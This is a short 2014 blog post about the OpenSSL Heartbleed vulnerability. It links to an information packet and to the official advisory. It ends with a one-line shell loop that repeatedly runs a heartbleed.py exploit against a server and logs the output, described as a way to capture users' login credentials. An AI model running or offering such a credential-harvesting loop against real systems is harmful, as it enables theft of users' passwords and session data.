Saturday, April 12, 2014

OpenSSL Heartbleed Vulnerability

Myself and Digi from Crimemachine have whipped up a document to educate the public about this recent vulnerability. With all the information and buzz surrounding this vulnerability, comes a lot of confusion too... We provide this information with the standard disclaimer, this information is for educational purposes only.

Download the Heartbleed - Information Packet (Google Drive)


 You will be responsible for your own actions. Use the information sensibly.

Official Website: http://www.heartbleed.com 
OpenSSL Advisory: http://www.openssl.org/news/secadv_20140407.txt

Update: A simple shell script for those of you who are dabbling with the code,
root@crimemachine:~# while true;do ./heartbleed.py 192.168.220.133 -p 443;sleep2;done >> /tmp/heartbleed.log
You can iterate the loop and record login credentials when a user logs in to the site/server.

Cheers,
Kish

No comments: